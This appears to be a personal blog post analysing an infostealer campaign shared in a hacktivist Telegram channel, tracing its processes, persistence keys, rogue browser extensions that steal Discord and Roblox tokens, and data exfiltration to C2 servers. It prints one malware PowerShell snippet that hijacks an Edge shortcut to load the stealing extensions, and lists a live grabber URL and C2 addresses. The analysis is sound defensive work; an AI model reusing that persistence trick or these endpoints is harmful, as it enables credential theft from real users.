root@mr-resetti:~$

Uncovering a Palestinian & French Stealer Campaign

An interesting file was dropped in a Telegram channel I was apart of with the message “i will be using my private stealer for #opisrael, message me to help it spread”. This blog shows the world of Stealer-as-a-Service markets, and political hacktivism within Telegram against Israel, and a very noisy piece of malware!

The Start:

As someone who is very interested in the latest hacking news/malware techniques/threat intelligence/etc, I am in a lot of “underground” Telegram channels, and sometimes, I will come across a new unique malware sample or someone will try and social engineer me into installing malware like my Reversing a “Game Cheat” Blog

In this case, it was in the “ℭ0𝔡3𝔅𝔯34𝔨3𝔯𝔰 ANONYMOUS” (meaning CODEBREAKERS ANONYMOUS) channel (I know, leave ‘em be.. they’re having fun) where one of their “leaders” known as “𝐒𝐡𝐚𝐫𝐢𝐟𝐟” posted a gofile.io link to a malicious stealer with the caption: “i will be using my private stealer for #opisrael, message me to help it spread”.

image

The “Threat Actor”

Shariff, the one who sent the file, is a TikTok “Threat Actor” (heavy emphasis on the quotes) who posts videos related to hacking and the “life” of being a hacker (I think, idk figure it out yourself lol: https://www.tiktok.com/@s.a.m.i.r_012 & Second account https://www.tiktok.com/@s.a.m.i.r_01)

image

He has a Yemen flag in his TikTok bio, so I believe he resides in Yemen and is supporting Palestine through the Israel v Palestine conflic by spreading malware to any Israeli citizens.

He also has a few other friends that post in the same Telegram channel and they like to post the same type of stuff, in case you wanted some more entertainment: https://www.tiktok.com/@ii.clappz/video/7300147463090998535 & https://www.tiktok.com/@yoozy_1337/video/7295312479641505030

My point I’m trying to prove is we are not dealing with an APT here. But I personally think it is interesting to see what these foreign “hacktivists” are up to, what malware they are using, and who they are working with.

The File, named 321chat.exe:

I don’t really know where to start with this malware, it is a stealer malware first of all, but not one that I have seen before. The hash has never been uploaded to VirusTotal and it is Fully Undetected: https://www.virustotal.com/gui/file/c7b11a2b9719590183eb1985f61b7b5b11b8bdead56003c65279d9a7c47b728a

Some new, unique malware! Just asking to be analysed. Let’s get started.

ProcDot Analysis:

I used ProcDot to visualize the malware layout and how it executes, and from my analysis, the file executes multiple child processes of itself, the most interesting one being PID: 4320

image

This PID: 4320 directly creates a thread with ID: 6184, this thread is used for creating the persistence registry keys, and creating other threads that are used for stealing the users information and creating the final ZIP file which is eventually sent to the C2.

image

^^^ TID: 6184 creating a persistent registry key ^^^

image

^^^ TID: 6184 creating 4 separate threads ready for writing the stolen information into a ZIP file that will be sent to the C2 ^^^

Using ProcDot, we can actually target specific child processes and see what they were doing, since we are focusing on the stealer malware, I will change the render configuration to only show threads and processes created by PID: 4320

image

TID-6184, Hawkish Grabber

After this specific TID is created, we can see some DLLs being loaded, some communications being made to some servers, one of them specifically stood out to me, 185.199.117.133:443. The Child TIDs: 7068, 9708, 2984, and 7952 were being used to download a zip file called "extensions.zip". Eventually, TIDs: 7068 and 7952 both start reading data from the ZIP file then start writing data to the following folders:

C:\ProgramData\ChromeExtensionsNova\extension-cookies

C:\ProgramData\ChromeExtensionsNova\extension-tokens

These folders both contain .js files which are used to enumerate Discord account values and steal tokens and information:

image

^^^ background.js script found inside C:\ProgramData\ChromeExtensionsNova\extension-tokens\js\ ^^^

The script also shows some information about the type of stealer that is being used:

image

As you can see, they have a Telegram: https://t.me/Sordeal

image

They also have a Discord server where they sell access to the stealer for anywhere from $5 for 1 month access to $70 for 24 months access

image

Furthermore they have a Sellix page where you can again buy the stealer, although the Sellix site is a lot cheaper lol:

image

28/11/2023 UPDATE

The selling page has changed to a Sellpass shop:

image

These guys are French, and are what makes the title of this blog, the “threat actors” like Clappz, Yoozy, and Samir, are all either from Yemen or support Palestine and want to attack Israel, and the French lads are the developers/owners of Nova Sentinel.

To prove this, since “YooZy” got a bit mad at me in Discord for this blog and first tried to claim that the Stealer wasnt Nova Sentinel, which he later backtracked on. He then tried to claim that nobody was French, and the “real” (whatever that means) Nova dev/owner isnt even in his own Discord/Telegram channels and also isnt French

So, I went and re-joined the Nova Discord server after leaving, and could see a couple videos posted by the “Owner”:

Screenshot_20

As you can see, he has the “Owner” role:

Screenshot_21

And lo and behold, we click on the Tutorial videos and can clearly see the Owner/person who recorded this video is indeed French

Screenshot_19

Furthermore, in their public Telegram channel where they post all the latest updates, they openly post in English and French, if this isnt enough proof to say “The creators or Nova Sentinel are French” then idk what is, they also charge everyone in Euros, the currency of France so yeah idk what YooZy’s talking about lol.

image

Anyways it looks like this one specifically is “Hawkish Grabber” considering the webhook_url variable seen above. Not sure if “Nova Sentinel” and “Hawkish Grabber” are the same thing, or if they are different, but this piece of the malware is definitely grabbing user information/cookies/tokens.

The other folder, C:\ProgramData\ChromeExtensionsNova\extension-cookies is a folder specifically targeting Roblox accounts and cookies, it then sends the data to the C2:

image

^^^ background.js script found inside C:\ProgramData\ChromeExtensionsNova\extension-cookies\scripts\ ^^^

After the ZIP file is completely unpacked, it is deleted:

image

Daddy TID 6184 then creates a new PS1 file called salutzasYm.ps1

image

This file has the following contents:

$WshShell = New-Object -comObject WScript.Shell;
$Shortcut = $WshShell.CreateShortcut("C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Edge.lnk");
$Shortcut.Arguments = "--load-extension=C:\ProgramData\ChromeExtensionsNova\extension-cookies,C:\ProgramData\ChromeExtensionsNova\extension-tokens";
$Shortcut.Save()

This script is adding the extensions that were downloaded earlier into the default browser, once this is done, whenever the user opens their browser, it will auto redirect to Discord & Roblox and inject the cookie stealer which will steal the cookies and send it to the Hawkish Grabber API link seen earlier: https://hawkish.eu/grabber/nova/TkoCCyWOcryKWiOgbvNVgqBnekAvNhrIzrFdfPpknSHwnOQTqBxJWYDSkWhr

Then the TID 6184 makes another persistent registry key for cmd.exe, probably to ensure the PS1 web injection script executes at startup.

image

Later on it also makes one for powershell.exe

image

Inbetween that, TID 6184 also writes some data to the System Info.txt file

image

NOTE, just incase you’re confused with all the different TIDs being thrown around, TID 6184 is the main TID has been used for creating persistent registry keys, writing the stolen data to C:\Users\Analysis\AppData\Local\Temp\fMYoQic11EKsYaZdyub7 (the fMYoQic11EKsYaZdyub7 folder is randomly generated), and PID 4320 is the Parent Process that has created the Thread ID 6184. Finally, the Child TIDs: 7068, 9708, 2984, and 7952 of which their Parent TID is 6184, were being used to download a zip file called "extensions.zip". But they will soon be used to write all of the stolen information inside C:\Users\Analysis\AppData\Local\Temp\fMYoQic11EKsYaZdyub7 into a ZIP file called GB_NOVA_Analysis.zip (My computer name is Analysis, so it would be GB_NOVA_<YOUR-COMPUTER-NAME>.zip)

Here is the Process Hierarchy:

After the persistence registry keys have been added, the stealer starts to enumerate the machine and write stolen information into the randomly generated folder in Temp (C:\Users\Analysis\AppData\Local\Temp\fMYoQic11EKsYaZdyub7), for example here below it is writing the stolen Discord information:

image

Though I dont have Discord on the VM, so it doesn’t log anything:

image

I managed to rip the folder from the Temp folder before it was Zipped up and sent to the C2 and deleted, this was the folder list:

image

It stole some information, nothing special, just a list of downloads and some dead cookies, but these txt files go to show that if i had any Credit Cards saved then they would be logged also:

image

To get a look at some of the logs, here is my stolen history information lol

image

(Yes, i was using Edge to download Firefox, what else do you use it for?)

It also steals system information, lists what applications are installed, and takes a screenshot of whatever is on the screen (will come back to this screenshotting function later). Along with this, it also steals Wi-Fi passwords because that is useful when you live nowhere near the victim. :)

image

The malware also uses the child TIDs to enumerate web data (downloads, history, cookies, etc) and login data from the installed browsers:

image

Here it is commanding TID 7068 to read the Web data file:

image

After reading the Microsoft Edge Web+Login data files. The malware switches targets to Firefox, since its the only other browser installed.

image

It then compiles all of this data into the Downloads.txt file, History.txt file, etc etc.

Once the malware is done compiling all stolen information into its Temporary randomly generated folder, it uses Child TIDs: 7068, 9708, 2984, and 7952 to pack it all into GB_NOVA_<YOUR-COMPUTER-NAME>.zip. Below is a GIF of the process:

90c6d2bd05efbf90788adef0ae433a07

The main stealer process PID 4320 then sends the data to 163.5.121.96, 31.14.70.243, and 51.178.66.33 these are probably Telegram API’s or Discord webhooks. Below is another GIF of the process:

349055b5ab3b84cd1ef91fe6bbb02df7

The malware also creates a file called (random characters)_temp.ps1

image

Which creates a image file which is a screenshot of whatever is on the screen at the time, and the computer name along with date, this file is also packed into C:\Users\Analysis\AppData\Local\Temp\fMYoQic11EKsYaZdyub7\System

Thats pretty much it

After i finished analysing the malware, i woke up the next day to some posts in the chat, which included my virtual machines stolen information lmao

image

image

566

Thats a wrap folks, if you want the malware, tough, its 70MB and Github only lets me upload 25MB max.